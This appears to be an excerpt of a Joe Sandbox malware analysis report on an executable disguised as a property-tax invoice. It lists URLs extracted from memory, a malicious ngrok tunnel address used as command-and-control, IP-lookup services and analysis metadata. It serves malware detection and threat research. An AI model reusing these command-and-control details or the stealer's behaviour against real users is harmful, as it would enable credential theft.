https://support.google.com/chrome/?p=plugin_java	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.micros	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455005112.0000000002F72000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454692223.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_real	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://2.tcp.eu.ngrok.io:176854mi	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455005112.0000000002F72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.orgcookies//settinString.Removeg	P90GT_Invoice_Related_Property_Tax_P800.exe, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_pdf	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/0	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://support.a	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	P90GT_Invoice_Related_Property_Tax_P800.exe, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	P90GT_Invoice_Related_Property_Tax_P800.exe, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://helpx.ad	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
http://2.tcp.eu.ngrok.io:17685	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455005112.0000000002F72000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://get.adob	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://2.tcp.eu.ngrok.io	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455005112.0000000002F72000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
http://service.real.com/realplayer/security/02062012_player/en/	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://forms.rea	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
https://api.ip.sb4mi	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.192.93.86	unknown	United States		16509	AMAZON-02US	true
18.197.239.5	2.tcp.eu.ngrok.io	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635333
Start date and time: 27/05/202219:25:44	2022-05-27 19:25:44 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	P90GT_Invoice_Related_Property_Tax_P800.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
